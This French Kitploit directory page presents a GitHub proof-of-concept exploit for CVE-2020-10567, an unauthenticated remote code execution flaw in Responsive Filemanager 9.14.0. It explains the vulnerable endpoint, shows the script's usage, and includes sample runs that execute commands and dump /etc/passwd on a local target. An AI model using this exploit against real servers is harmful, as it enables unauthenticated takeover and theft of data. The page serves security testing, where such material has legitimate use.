Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-10567 — RCE RESPONSIVE filemanager v.9.14.0 | Kitploit
Outils/GitHubGitHub/pierreadams/cve-2020-10567
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubpierreadams/cve-2020-10567

CVE-2020-10567

RCE RESPONSIVE filemanager v.9.14.0

Voir le dépôt
4il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC-CVE-2020-10567

POC RCE - RESPONSIVE filemanager v.9.14.0. pas la branche principale ⚠️

Projet GitHub : https://github.com/trippo/ResponsiveFilemanager

Prérequis : Aucun, cet exploit ne nécessite pas d'authentification.

L'application Responsive Filemanager est un outil de gestion de fichiers basé sur le web utilisé pour manipuler des fichiers sur un serveur. Cette vulnérabilité (CVE-2020-10567) permet à un attaquant d'exploiter une validation d'entrée incorrecte via ajax_calls.php?action=save_img pour effectuer des téléchargements de fichiers arbitraires, conduisant à une exécution de code à distance sur le système cible.

Cet exploit est inspiré d'une preuve de concept publique disponible sur Packet Storm. (https://packetstorm.news/files/id/171280)

Utilisation :

root@kitploit:~
$ python3 POC_CVE-2020-10567.py -h
usage: POC_CVE-2020-10567.py [-h] [-C COOKIE] -c COMMAND -u URL

Exploit RESPONSIVE filemanager v.9.14.0 (not Main branche!!)

options:
  -h, --help            show this help message and exit
  -C COOKIE, --cookie COOKIE
                        Cookie
  -c COMMAND, --command COMMAND
                        Command to execute
  -u URL, --url URL     RESPONSIVE filemanager url
root@kitploit:~
$ python3 POC_CVE-2020-10567.py -c 'id' -u http://127.0.0.1:8080
[>] Cookie collecting ... 
[>] Cookie collect : PHPSESSID=XXXXXXXXXXX
[>] Requets POST Send
[>] payload send
[>] Response:

uid=1000(application) gid=1000(application) groups=1000(application)

Vous pouvez spécifier un cookie :

root@kitploit:~
$ python3 POC_CVE-2020-10567.py -c 'cat /etc/passwd' -u http://127.0.0.1:8080 -C Cookie_Test
[>] Cookie : Cookie_Test
[>] Cookie collect : PHPSESSID=Cookie_Test
[>] Requets POST Send
[>] Payload send
[>] Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
application:x:1000:1000::/home/application:/bin/bash
blackfire:x:999:999::/dev/null:/bin/sh
postfix:x:101:104::/var/spool/postfix:/usr/sbin/nologin
Télécharger l’outil